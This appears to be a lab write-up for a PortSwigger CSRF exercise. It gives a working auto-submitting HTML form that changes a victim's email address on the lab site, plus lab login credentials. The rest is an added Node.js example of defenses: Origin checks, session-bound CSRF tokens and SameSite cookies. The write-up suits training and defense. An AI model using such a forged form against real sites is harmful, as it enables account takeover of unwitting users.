01 Lab: CSRF vulnerability with no defenses
This lab's email change functionality is vulnerable to CSRF.
To solve the lab, craft some HTML that uses a CSRF attack to change the viewer's email address and upload it to your exploit server.
You can log in to your own account using the following credentials: wiener:peter
During the email change process, we see that the following request is executed:

The body content is a form that, if the victim clicks, will automatically change their email to [email protected]
<form method="POST" action="https://0abe003b033093b08170582d00c7009b.web-security-academy.net/my-account/change-email">
<input type="hidden" name="email" value="[email protected]">
</form>
<script>
document.forms[0].submit();
</script>
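The form above is accepted because the endpoint trusts any POST that carries the session cookie. The following is an added example, not part of the lab or of this write-up, of the server-side checks that reject such a request: an Origin check, a session-bound CSRF token, and a SameSite session cookie. `APP_ORIGIN`, the `csrf` field name, the request shape and all sample values are assumptions.

```javascript
// Added example: CSRF checks for a state-changing endpoint such as
// POST /my-account/change-email. All names and values here are hypothetical.
const crypto = require('node:crypto');

const APP_ORIGIN = 'https://app.example';       // assumed site origin
const SERVER_SECRET = crypto.randomBytes(32);   // per-deployment HMAC key

// Token bound to the session: HMAC(secret, sessionId). A cross-site page
// cannot read or compute it, so it cannot place it in a forged form.
function issueCsrfToken(sessionId) {
  return crypto.createHmac('sha256', SERVER_SECRET).update(sessionId).digest('hex');
}

function tokenMatches(sessionId, supplied) {
  if (typeof supplied !== 'string') return false;
  const expected = Buffer.from(issueCsrfToken(sessionId), 'utf8');
  const given = Buffer.from(supplied, 'utf8');
  // timingSafeEqual throws on length mismatch, so compare lengths first.
  return given.length === expected.length && crypto.timingSafeEqual(given, expected);
}

// req: { method, headers: { origin }, sessionId, body: { email, csrf } }
function checkChangeEmail(req) {
  if (req.method !== 'POST') return { ok: false, reason: 'method' };
  if (!req.sessionId) return { ok: false, reason: 'no-session' };
  // Browsers send Origin on cross-site POSTs; reject anything but our own.
  if (req.headers.origin !== APP_ORIGIN) return { ok: false, reason: 'origin' };
  if (!tokenMatches(req.sessionId, req.body.csrf)) return { ok: false, reason: 'csrf-token' };
  return { ok: true, reason: null };
}

// Session cookie attributes that keep the cookie off cross-site POSTs.
function sessionCookie(sessionId) {
  return `session=${sessionId}; Path=/; Secure; HttpOnly; SameSite=Strict`;
}

// Constructed sample requests.
const sid = 'constructed-session-id';
const forged = {   // shape of the auto-submitted form: only an email field
  method: 'POST', headers: { origin: 'https://exploit-server.example' },
  sessionId: sid, body: { email: 'attacker@example.test' },
};
const legit = {
  method: 'POST', headers: { origin: APP_ORIGIN },
  sessionId: sid, body: { email: 'user@example.test', csrf: issueCsrfToken(sid) },
};
console.log(checkChangeEmail(forged), checkChangeEmail(legit));
```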

